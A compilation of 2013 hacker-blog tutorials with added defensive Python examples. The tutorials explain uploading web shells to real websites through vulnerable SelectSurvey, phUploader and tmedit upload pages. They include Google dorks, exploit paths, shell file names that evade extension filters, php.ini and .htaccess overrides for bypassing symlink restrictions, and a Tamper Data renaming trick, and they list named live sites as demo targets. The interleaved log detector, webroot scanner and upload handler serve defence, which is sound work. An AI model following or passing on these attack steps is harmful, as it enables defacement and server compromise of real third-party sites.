
Thursday, 21 March 2013

Bypassing the 18+ Restriction on YouTube

Refer to the picture below.

You've surely run into this before, right? So how do you bypass it?

OK, let's start.

OK, look at the link. It looks like this:

Link:
http://www.youtube.com/watch?v=1Lu0qhRrIow . Take only the video ID: 1Lu0qhRrIow

Take THIS link:

http://www.youtube.com/v/Insert ID?fs=1&amp

In place of "Insert ID", put the ID of the video that was blocked.

Example for the video link above:

http://www.youtube.com/v/1Lu0qhRrIow?fs=1&amp

Paste it into the address bar and enjoy the video.

How to Deface/Hack a Website via File Upload Shell



Assalamualaikum and greetings. Today HMCA wants to teach an exploit for the SelectSurvey CMS. This CMS is built on ASP.NET.
This exploit lets you upload an .asp shell.

OK, let's start.

1. First, find a vulnerable website with a Google dork:

"SelectSurvey.NETv4 site:uk"
"SelectSurvey.NETv4"

Note: play around with the dork to get more results.

2. Pick one of the websites from the results.

3. Add this to the end of the URL of the website you picked:

/survey/UploadImagePopup.aspx

or, if the website uses a subdomain, the URL will look like this:

http://survey.site.com/UploadImagePopup.aspx

After that, the website's page will look more or less like this:



Click Choose File and select your shell.asp.
Then Upload.

Note: get an ASP shell. Refer to THIS entry.

4. If it works, something like this will appear:




If it doesn't work, change the shell's extension to shell.asp.jpg or another extension. If that still doesn't work, find another website.

5. OK, now it's time to see the shell that was uploaded.
Just add this to the end of the URL:

http://www.site.com/UploadedImages/shell.asp
shell.asp is the name of your shell.


That's all, good luck :D


Live Demo :

https://intranet.yorksj.ac.uk/Survey/UploadImagePopup.aspx
http://survey.mywisenet.com.au/UploadImagePopup.aspx
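
From the defender's side, the sequence in this post leaves a clear trail in the web server log: a POST to UploadImagePopup.aspx followed by a request for a script-named file under /UploadedImages/. The following is an added example, not part of the original post; the log layout, IP addresses and log lines are constructed for illustration.

```python
import re

# Constructed IIS-style access log lines (date time client-ip method path query status).
SAMPLE_LOG = """\
2013-03-21 10:01:02 203.0.113.7 GET /survey/UploadImagePopup.aspx - 200
2013-03-21 10:01:40 203.0.113.7 POST /survey/UploadImagePopup.aspx - 200
2013-03-21 10:02:05 203.0.113.7 GET /UploadedImages/shell.asp - 200
2013-03-21 10:03:11 198.51.100.4 POST /survey/UploadImagePopup.aspx - 200
2013-03-21 10:03:30 198.51.100.4 GET /UploadedImages/logo.png - 200
2013-03-21 10:04:00 192.0.2.9 GET /UploadedImages/a.asp;me.jpg - 404
"""

UPLOAD_PAGE = re.compile(r"/UploadImagePopup\.aspx$", re.I)
UPLOAD_DIR = re.compile(r"/UploadedImages/", re.I)
# A script extension anywhere in the file name, so "x.asp.jpg" and "x.asp;me.jpg" match too.
SCRIPT_NAME = re.compile(r"\.(asp|aspx|asa|cer|ashx|php)(?=[.;:%]|$)", re.I)

def find_suspicious(log_text):
    """Return one alert per request for a script-named file in the upload directory."""
    uploaders = set()   # client IPs that POSTed to the upload page earlier in the log
    alerts = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        _date, time, ip, method, path, _query, status = fields[:7]
        if method == "POST" and UPLOAD_PAGE.search(path):
            uploaders.add(ip)
        elif UPLOAD_DIR.search(path) and SCRIPT_NAME.search(path.rsplit("/", 1)[-1]):
            served = status == "200"
            alerts.append({
                "time": time, "ip": ip, "path": path,
                # Highest priority: same client uploaded, then the script was served.
                "severity": "high" if served and ip in uploaders else "review",
            })
    return alerts

if __name__ == "__main__":
    for alert in find_suspicious(SAMPLE_LOG):
        print(alert)
```

An image directory should never serve a 200 for a script-named file, so any "high" alert means the upload page needs to be restricted and the directory checked for dropped files.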

Tutorial: Bypassing Symlink Forbidden




Assalamualaikum and greetings. Today HMCA wants to teach how to bypass symlink forbidden. You've surely worked hard to get a symlink, and then suddenly when you try to open the config file it shows Forbidden, right?
Like this:





Must be really annoying, hahaha. OK, don't worry, let me teach you how to bypass it :)

1. First, create a php.ini file.
Copy the code below:


safe_mode=OFF
disable_functions=NONE

Then paste it into Notepad and save as

Name: php.ini
File type: All Files


2. Then we create a .htaccess file.
Copy the code below:

Options FollowSymLinks MultiViews Indexes ExecCGI

Paste it into Notepad and save as
Name: .htaccess
File type: All Files

3. Next, you just need to upload them into the directory that holds your symlinked config file from earlier. Upload using the shell xD
With this, your symlink will be bypassed :D

If it doesn't work, upload to the public_html directory.

That's all the steps... easy, right? Good luck.
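
For a hosting administrator, the two dropped files and the symlink are themselves the indicators to hunt for. The following is an added example, not part of the original post: it walks a web root and reports `.htaccess` and `php.ini` files carrying the directives shown above, plus symlinks that resolve outside the web root. The directory layout it builds for the demo is constructed.

```python
import os
import re
import tempfile

# Directives from the two dropped files above; a leading "-" (disable) is not flagged.
RISKY_HTACCESS = re.compile(
    r"^\s*Options\b.*(?<![-\w])(FollowSymLinks|ExecCGI|Indexes)\b", re.I | re.M)
RISKY_PHPINI = re.compile(
    r"^\s*(safe_mode\s*=\s*off\b|disable_functions\s*=\s*(none)?\s*$)", re.I | re.M)

def scan(webroot):
    """Return sorted (relative_path, reason) findings under webroot."""
    root = os.path.realpath(webroot)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):   # does not follow symlinks
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if os.path.islink(full):
                target = os.path.realpath(full)
                if target != root and not target.startswith(root + os.sep):
                    findings.append((rel, "symlink leaves web root"))
                continue
            if name not in (".htaccess", "php.ini") or not os.path.isfile(full):
                continue
            with open(full, errors="replace") as fh:
                text = fh.read()
            pattern = RISKY_HTACCESS if name == ".htaccess" else RISKY_PHPINI
            if pattern.search(text):
                findings.append((rel, "permissive " + name))
    return sorted(findings)

def build_demo_tree():
    """Constructed sample: one tampered upload directory, one benign directory."""
    base = tempfile.mkdtemp()
    web, outside = os.path.join(base, "public_html"), os.path.join(base, "other_user")
    os.makedirs(os.path.join(web, "uploads"))
    os.makedirs(os.path.join(web, "static"))
    os.makedirs(outside)
    files = {
        "uploads/.htaccess": "Options FollowSymLinks MultiViews Indexes ExecCGI\n",
        "uploads/php.ini": "safe_mode=OFF\ndisable_functions=NONE\n",
        "static/.htaccess": "Options -Indexes\n",
    }
    for rel, body in files.items():
        with open(os.path.join(web, rel), "w") as fh:
            fh.write(body)
    open(os.path.join(outside, "config.php"), "w").close()
    os.symlink(os.path.join(outside, "config.php"), os.path.join(web, "uploads", "1.txt"))
    return web
```

The per-directory overrides only take effect where the server allows them, so the matching Apache hardening is `AllowOverride None` (or at least without `Options`) and `SymLinksIfOwnerMatch` in place of `FollowSymLinks` for user content.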

Sunday, 3 March 2013

phUploader Remote File Upload Vulnerability

Google Dork : intitle:Powered By phUploader

Go to Google.com and enter this dork, then look at the search results.
Exploit URL:
http://{site.com}/path/upload.php
or
http://site.com/upload.php

Select any website and upload your file there.
The website allows uploading .jpg, .png, .gif and .png files only.
Anyway, you can upload your deface as .jpg, and mirror websites like
zone-h accept it as a defacement. If you want to upload a shell, then upload it as
shell.php.jpg
After uploading your file you'll get a message:
Your file(s) have been uploaded!

See the link below this message to view your uploaded file.

Live Demo ~ http://humortshirtzone.com/phUploader.php
Uploaded File ~ http://www.humortshirtzone.com/uploads/1321616908.jpg
- See more at: http://cehtrick.blogspot.com/2013/01/phuploader-remote-file-upload.html#sthash.neWQhKKn.dpuf

Image Upload Vulnerabilities

Dork: inurl:/editor/tmedit/popups
Exploit Path: /editor/tmedit/popups/InsertFile/insert_file.php

There You Can Upload Shell As Image.
Then Your Shell Link Will Be Like http://vulnrablesite.com/images/yourfilehere
Find Different Directories To Find Out Your Shell :)

ASP Shell Upload

How To Hack ASP Sites. First You Need To Find The Website Upload Path To Upload Shell. For That Use Google Dorks.

Google Dorks:




You Can Use "allinurl" Instead Of "inurl" In Google Dorks.

Shell Formats:
shell.asp;me.jpg
shell.asp
shell.asp.jpg
- See more at: http://www.defencexposure.com/2012/06/image-upload-vulnerabilities.html#sthash.nHaZTWeu.dpuf

sql vuln gov


- See more at: http://voice0fblackhat.blogspot.com/2012/01/sqli-dork-for-gov.html#sthash.owINqw1u.dpuf

Shell Upload Via Tamper Data

Hello Hackerz!!

Sometimes You Have Trouble Uploading A Shell To The Server In The "shell.php" Format. So Here's The Solution.



Let's Have A Look. 
At First Install The Add-on "Tamper Data" In Mozilla Firefox. Go Here For Tamper Data.



Now Change The Shell Name Into ".jpg Format" Like This,



shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;


Now Go To The Uploader URL. Let The Uploader URL Be:

http://www.targetsite.com/upload.php




Now Select Your Shell In The Above Format, But Do Not Click The Upload Button Yet, Because Before That You've To Configure Tamper Data. Open Tamper Data From Mozilla.

Firefox > Tools > Tamper Data.

So Let's Have A Look:

  




Now You've To Click "Start Tamper" From Tamper Data Window And Start Tampering. Before Tampering Close All Other Tabs.

Now Click Upload Button From Your Target Site To Upload Your Shell.

Now You should Get Tamper Request With Your Target Site. Click Tamper.



Now You Should Get The "Tamper Popup" Window. From Here You've To Change Your Shell Format Into ".php".








At The Right Side Have A Look At "Post Parameter Value" Section And Find Your Shell Name. Change It Like "shell.php" And Press Ok.

Great!!

Now Submit.

All Is Done.

Now Go To Your Shell And Deface It :D :D
- See more at: http://www.defencexposure.com/2013/01/shell-upload-via-tamper-data.html#sthash.tIzbXV3l.dpuf
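
Both the file name lists earlier on this page and the Tamper Data steps depend on the server trusting a file name that the client controls, including one rewritten after the browser-side check has passed. The following is an added example, not part of the original posts, of an upload handler that ignores the supplied name; `store_upload`, `classify_name` and the sample bytes are constructed for illustration.

```python
import os
import re
import secrets
import tempfile

# Leading bytes of the image types the upload forms above claim to accept.
MAGIC = {b"\xff\xd8\xff": ".jpg", b"\x89PNG\r\n\x1a\n": ".png",
         b"GIF87a": ".gif", b"GIF89a": ".gif"}
# Script extension followed by ".", ";", ":", "%" or end of name, as in the name lists above.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|asp|aspx|asa|cer)(?=[.;:%]|$)", re.I)

def classify_name(client_name):
    """Label the client-supplied name for the audit log; it is never used for storage."""
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    return "script-extension" if SCRIPT_EXT.search(base) else "ok"

def store_upload(client_name, data, dest_dir):
    """Validate on the server; return (stored_path, name_label) or raise ValueError."""
    ext = next((e for magic, e in MAGIC.items() if data.startswith(magic)), None)
    if ext is None:
        raise ValueError("content is not a JPEG, PNG or GIF")
    # Server-generated name with the extension derived from content: whatever the
    # request says (including a name rewritten in transit) cannot end up as .php/.asp.
    path = os.path.join(dest_dir, secrets.token_hex(16) + ext)
    with open(path, "xb") as fh:   # "x": fail rather than overwrite an existing file
        fh.write(data)
    return path, classify_name(client_name)

def demo():
    """Run constructed uploads through store_upload and return {name: (ext, label)}."""
    dest = tempfile.mkdtemp()
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16   # constructed JPEG-like bytes
    out = {}
    for name in ["photo.jpg", "shell.php", "shell.php.jpg", "shell.asp;me.jpg"]:
        path, label = store_upload(name, jpeg, dest)
        out[name] = (os.path.splitext(path)[1], label)
    return out
```

A magic-byte check does not prove the file is a clean image, so the upload directory should also have script handlers switched off; the stored name is what keeps the file from being mapped to a PHP or ASP handler.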